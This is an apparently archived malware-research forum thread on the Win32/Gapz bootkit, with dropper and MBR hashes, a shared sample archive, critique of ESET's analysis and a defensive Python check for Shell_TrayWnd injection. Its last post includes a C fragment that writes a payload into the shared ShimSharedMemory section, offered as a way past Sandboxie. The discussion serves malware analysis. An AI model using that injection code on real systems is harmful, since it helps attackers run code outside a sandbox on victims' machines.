Bootkit: Win32/Gapz

Postby R136a1 » Thu Dec 27, 2012 12:27 pm

Hi there,

ESET (Aleksandr Matrosov) released an analysis of an interesting new Bootkit:

Win32/Gapz: steps of evolution
Win32/Gapz: New Bootkit Technique

Hashes of droppers and MBR are as follows:

Win32/Gapz.A (dropper)
SHA1 hash: 1f206ea64fb3ccbe0cd7ff7972bef2592bb30c84

Win32/Gapz.A (dropper)
SHA1 hash: dff6933199137cc49c2af5f73a2d431ce2e41084

Win32/Gapz.B (dropper)
SHA1 hash: e4b64c3672e98dc78c5a356a68f89e02154ce9a6

Win32/Gapz.C (dropper)
SHA1 hash: 85fb77682705b06a77d73638df3b22ac1dbab78b

Win32/Gapz.C (MBR)
SHA1 hash: b37afc51104688ea74d279b690d8631d4c0db2ad

If someone can provide a sample, please upload. Thanks!
R136a1
 
Posts: 215
Joined: Wed Jul 13, 2011 4:30 pm
Location: Germany
Reputation point: 136

Re: Bootkit: Win32/Gapz

Postby 360Tencent » Thu Dec 27, 2012 1:01 pm

3 droppers

Win32Gapz.zip
360Tencent
 
Posts: 116
Joined: Thu Dec 15, 2011 12:47 pm
Reputation point: 52

Re: Bootkit: Win32/Gapz

Postby kmd » Sat Dec 29, 2012 5:29 am

http://blog.eset.com/2012/12/27/win32gapz-steps-of-evolution


very "professional" analysis from twitter expert.

I. The Shell_TrayWnd inject has been publicly available since 2009 and was initially posted on virustech.org, a PUBLIC forum, as a PUBLIC post.
II. The SetWindowLongA call sets the address of the injected shellcode, not KiUserApcDispatcher (wtf Matrosov?); as proof, use the attached sample 82a19f2e4c9a1b4295a51df9d23af84aae848a7984c141a0c7f67b3bbb77b271. Break on SetWindowLongA: the address it points to is located in the explorer.exe address space; dump it and look inside.
kmd
 
Posts: 268
Joined: Mon Mar 15, 2010 4:09 am
Location: Russian Federation
Reputation point: 17
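A defender-side check for the Shell_TrayWnd technique kmd refers to above, added here as an example (not code from this thread, from ESET, or from the Gapz sample). It assumes the layout of the public technique: window long 0 of Shell_TrayWnd holds explorer's CTray object pointer and the object's first field is its vtable, which for a genuine object lies inside explorer.exe's image; run it with a Python whose bitness matches explorer.exe.

```python
import ctypes
import ctypes.wintypes as wt
import sys

PROCESS_QUERY_INFORMATION, PROCESS_VM_READ = 0x0400, 0x0010
PTR = ctypes.sizeof(ctypes.c_void_p)

class MODULEINFO(ctypes.Structure):  # psapi MODULEINFO
    _fields_ = [("lpBaseOfDll", ctypes.c_void_p), ("SizeOfImage", wt.DWORD),
                ("EntryPoint", ctypes.c_void_p)]

def in_image(addr, base, size):
    """True if addr lies inside the mapped image [base, base + size)."""
    return base <= addr < base + size

def classify(obj_ptr, vtable_ptr, base, size):
    """Assumed layout (public technique): window long 0 of Shell_TrayWnd points to
    explorer's CTray object; its first field is a vtable inside explorer.exe's image."""
    if obj_ptr == 0:
        return "no-object"
    return "ok" if in_image(vtable_ptr, base, size) else "suspicious"

def check_shell_traywnd():  # Windows-only, read-only live check; returns classify() verdict
    if sys.platform != "win32":
        raise OSError("requires Windows")
    u32, k32, psapi = ctypes.windll.user32, ctypes.windll.kernel32, ctypes.windll.psapi
    pid, hmod, needed, mi, vtable = wt.DWORD(), wt.HMODULE(), wt.DWORD(), MODULEINFO(), ctypes.c_void_p()
    u32.FindWindowW.restype = wt.HWND
    hwnd = u32.FindWindowW("Shell_TrayWnd", None)
    if not hwnd: raise OSError("Shell_TrayWnd not found")
    u32.GetWindowThreadProcessId.argtypes = [wt.HWND, wt.LPDWORD]
    u32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
    get_long = getattr(u32, "GetWindowLongPtrW", u32.GetWindowLongW)  # no *Ptr export on x86
    get_long.argtypes, get_long.restype = [wt.HWND, ctypes.c_int], ctypes.c_ssize_t
    obj_ptr = get_long(hwnd, 0) & ((1 << (8 * PTR)) - 1)  # unsigned view of the pointer
    k32.OpenProcess.restype = wt.HANDLE
    hproc = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
    if not hproc:
        raise ctypes.WinError()
    try:
        # The first module EnumProcessModules reports is the main image, explorer.exe.
        psapi.EnumProcessModules.argtypes = [wt.HANDLE, ctypes.c_void_p, wt.DWORD, wt.LPDWORD]
        psapi.EnumProcessModules(hproc, ctypes.byref(hmod), ctypes.sizeof(hmod), ctypes.byref(needed))
        psapi.GetModuleInformation.argtypes = [wt.HANDLE, wt.HMODULE, ctypes.c_void_p, wt.DWORD]
        psapi.GetModuleInformation(hproc, hmod, ctypes.byref(mi), ctypes.sizeof(mi))
        k32.ReadProcessMemory.argtypes = [wt.HANDLE, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t, ctypes.c_void_p]
        k32.ReadProcessMemory(hproc, obj_ptr, ctypes.byref(vtable), PTR, None)  # read vtable pointer
        return classify(obj_ptr, vtable.value or 0, mi.lpBaseOfDll or 0, mi.SizeOfImage)
    finally:
        k32.CloseHandle(hproc)
```

A "suspicious" verdict means the object pointer was redirected somewhere outside explorer's image, which is what the SetWindowLong-based injection leaves behind; the pure helpers can be exercised on any platform, the live check only on Windows.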

Re: Bootkit: Win32/Gapz

Postby Mut4nt » Sat Dec 29, 2012 6:58 am

This crap looks like that was made by skiddies
Mut4nt
 
Posts: 19
Joined: Wed May 30, 2012 5:41 am
Location: Russian Federation
Reputation point: 2

Re: Bootkit: Win32/Gapz

Postby EP_X0FF » Sat Dec 29, 2012 11:04 am

Matrosov maybe does not really understand what he reverses; this happens sometimes with everyone (with some people more often), but what exactly did you find in this "crap" that made you think
Mut4nt wrote: looks like that was made by skiddies
?
Ring0 - the source of inspiration
EP_X0FF
Global Moderator
 
Posts: 4752
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 562

Re: Bootkit: Win32/Gapz

Postby stds » Mon Dec 31, 2012 7:53 am

Mut4nt wrote:This crap looks like that was made by skiddies


I remember reversing one of your programs you tried to sell on hackforums: you had copied and pasted a public DKOM rootkit into a crypter, and you even left in the debug strings from the original author.

I don't think you have any room to be calling anything crap... especially not a bootkit...
stds
 
Posts: 1
Joined: Mon Dec 31, 2012 7:47 am
Reputation point: 0

Re: Bootkit: Win32/Gapz

Postby bao » Tue Feb 12, 2013 3:17 pm

bao
 
Posts: 20
Joined: Sat Sep 22, 2012 9:27 pm
Reputation point: 0

Re: Bootkit: Win32/Gapz

Postby 0x16/7ton » Tue Mar 05, 2013 8:54 am

Hello :)
Yes, maybe it is a bad article, but I wrote it here:
http://inresearching.blogspot.ru/2013/03/win32gapz-family-ring0-payload.html
Cause and effect
0x16/7ton
 
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation
Reputation point: 77

Re: Bootkit: Win32/Gapz

Postby kmd » Wed Mar 20, 2013 3:48 am

kmd
 
Posts: 268
Joined: Mon Mar 15, 2010 4:09 am
Location: Russian Federation
Reputation point: 17

Re: Bootkit: Win32/Gapz

Postby EP_X0FF » Wed Mar 20, 2013 4:01 pm

kmd wrote:Sandboxie bypassed by gapz?

http://exelab.ru/f/index.php?action=vth ... &page=1#11


The method of code injection used by Gapz is not isolated by Sandboxie 3.76 and Sandboxie 4.01 (Windows XP only), x86. As Sandboxie 4.0x now uses limited accounts for sandboxed processes, it is indeed more difficult to exploit: arbitrary code execution also will not work from a restricted account, as GetWindowLongPtr/SetWindowLongPtr will fail. It is very boring to test, but if you want you can follow the steps described in that link from exelab.

Code:
/* Fragment as posted; declarations, the missing closing brace and a check on the
   map result are added so it compiles. It opens the global shim shared section
   for write, maps it into the current process and writes at the tail of the view. */
UNICODE_STRING usShimSection;
OBJECT_ATTRIBUTES obja;
HANDLE hSection = NULL;
PUCHAR BaseAddress = NULL;   /* byte pointer so the tail arithmetic below is valid */
SIZE_T ViewSize = 0;         /* 0 = map the whole section; receives the mapped size */
NTSTATUS Status;

RtlInitUnicodeString(&usShimSection, L"\\BaseNamedObjects\\ShimSharedMemory");
InitializeObjectAttributes(&obja, &usShimSection, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = NtOpenSection(&hSection, GENERIC_WRITE, &obja);
if (NT_SUCCESS(Status)) {
    Status = NtMapViewOfSection(hSection, GetCurrentProcess(), (PVOID*)&BaseAddress,
                                0, 0, NULL, &ViewSize, ViewUnmap, 0, PAGE_READWRITE);
    if (NT_SUCCESS(Status)) {
        /* payload is copied to the end of the mapped view */
        memcpy((BaseAddress + ViewSize) - sizeof(payload), payload, sizeof(payload));
    }
}


If Sandboxie allows this, then this kind of sandboxing is one big lulz, and successful exploitation of this code is a question of just another exploit suitable for arbitrary code execution. Need more testing on various systems, various sections. As this is paid software I have no intention of helping the author fix his ridiculous bugs or mistakes in the sandbox architecture overall.

This method of arbitrary code execution was known for years before Matrosov's "discovery", and we are pretty sure we know how and where he found it, hmm.. "itw".

If you really care about security you already use a virtual machine (freeware btw), not paid, half-implemented virtualization with sleeping zero-days.
Ring0 - the source of inspiration
EP_X0FF
Global Moderator
 
Posts: 4752
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 562